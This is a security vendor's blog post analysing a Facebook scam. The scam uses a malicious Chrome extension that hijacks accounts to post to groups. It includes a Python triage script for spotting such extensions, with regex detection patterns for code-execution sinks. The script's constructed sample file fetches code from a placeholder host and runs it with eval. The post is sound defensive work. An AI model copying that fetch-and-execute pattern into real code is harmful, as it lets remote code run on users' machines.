Beware, Facebook Scam Shares Porn on Your Groups!

A new Facebook tag scam is spreading pornographic content in Facebook groups, Bitdefender warns.

We came across an evolved version of the known Facebook tag scam that manages to infiltrate Facebook groups to spread havoc on people’s Walls.

It all starts with a link that leads to a legitimate-looking Facebook page. The page promises to display a “Secret +18 Video”.

Once you hit the “Play” video button, you are asked to install a Chrome extension. Well, you probably think it is some kind of extension necessary in order to play video files. But, hold on a second! Since when do you need an extension to play a YouTube video in Chrome, right?

The extension calls itself “Fome He” in this case, and has infected 3,070 users. The name differs (another example is “Loviv”) from one infection to another because after receiving tons of reports, Google will most likely decide to block the extension. And then, the writers of the malware will have to upload another extension.

Looking at the source of the page, we can see that it is “pure static”, in the sense that no action can be taken on it. This is just a “trick”: every action taken on this page results in a prompt to install the extension.

Once installed, the extension redirects users who are not logged in to an authentic Facebook login page.

The installed extension contains the following files and directories:

  1. akeka.js
  2. 9 directories with random names

The 9 randomly named directories contain files with random names and irrelevant data, approximately 7,8 KB in size.

The akeka.js file is used to make a request to a hardcoded URL and to execute a new script. The downloaded script collects data such as the user ID and the browser timestamp, and helps modify the user’s Facebook privacy settings.
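To check an unpacked extension folder for the layout described above, here is a triage sketch added as an example (it is not Bitdefender's tooling). The indicator patterns, the threshold of 3 unreferenced directories, the function names and the sample file contents are assumptions made for illustration.

```python
import os, re, tempfile
URL_RE = re.compile(r"""["']https?://[^"'\s]+["']""")  # hardcoded URL literal
# Assumed, non-exhaustive list of ways JavaScript runs code obtained at runtime.
SINK_RE = re.compile(r"""\beval\s*\(|\bnew\s+Function\s*\(|createElement\(\s*["']script["']""")

def read(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()

def audit_extension(root, min_filler_dirs=3):
    """Audit one unpacked extension directory; returns a findings dict."""
    entries = sorted(os.listdir(root))
    top_files = [e for e in entries if os.path.isfile(os.path.join(root, e))]
    sources = {f: read(os.path.join(root, f)) for f in top_files
               if f.endswith((".js", ".json", ".html"))}
    loaders = [f for f, src in sources.items()
               if f.endswith(".js") and URL_RE.search(src) and SINK_RE.search(src)]
    referenced = "\n".join(sources.values())
    filler = []
    for d in entries:
        path = os.path.join(root, d)
        # Names starting with "_" (e.g. _locales) are reserved by Chrome; skip them.
        if not os.path.isdir(path) or d.startswith("_"):
            continue
        names = os.listdir(path)
        # Filler: neither the directory nor its files are named by manifest or scripts.
        if names and d not in referenced and not any(n in referenced for n in names):
            filler.append(d)
    return {"remote_loaders": loaders, "filler_dirs": filler,
            "suspicious": bool(loaders) and len(filler) >= min_filler_dirs}

def build_sample(root):
    """Constructed sample mirroring the layout described above (not the real files)."""
    with open(os.path.join(root, "manifest.json"), "w") as fh:
        fh.write('{"name": "sample", "background": {"scripts": ["akeka.js"]}}')
    with open(os.path.join(root, "akeka.js"), "w") as fh:
        fh.write('var x = new XMLHttpRequest();\n'
                 'x.open("GET", "http://placeholder.invalid/s.js", false);\n'
                 'x.send(); eval(x.responseText);\n')
    for i in range(9):
        d = os.path.join(root, "qzx%dwvk" % i)
        os.mkdir(d)
        with open(os.path.join(d, "jhq%dpl" % i), "wb") as fh:
            fh.write(b"\x00" * 7800)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(audit_extension(tmp))
```

Either signal alone is weak, since legitimate extensions also call remote APIs and ship asset folders; the combination is what matches the sample described here.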

Next, the malware extracts the full list of groups the infected user is part of. It randomly selects a maximum of 10 groups (the limit is specified in the config object). It creates a fake page under the same user where it posts the image of the Play button.

Also, while analyzing the entire JavaScript, we saw a portion of code that never executes. The code appears to be responsible for adding new friends, so we suppose it is a beta version of an add-friends feature, as can be seen from the function code.

The entire execution flow is shown in the next diagram:

Here you can see the activity on the account after a couple of minutes:

And the menu under the newly created page:

Also, if you go to the Activity Log from the account, you can see a list of posts that were made in different groups.

Remember, don’t click anything that looks fishy, regardless of how shocking or inciting it appears to be. Hackers count on your curiosity to make you part of the scam. Stay safe!

The technical information is provided courtesy of Victor Luncasu, malware researcher at Bitdefender.

About The Author

Security Specialist

Alexandra started writing about IT at the dawn of the decade – when an iPad was an eye-injury patch, we were minus Google+ and we all had Jobs. She has since wielded her background in PR and marketing communications to translate binary code to colorful stories that have been known to wear out readers’ mouse scrolls. Alexandra is also a social media enthusiast who ‘likes’ only what she likes and LOLs only when she laughs out loud.

© 2012 Powered By Bitdefender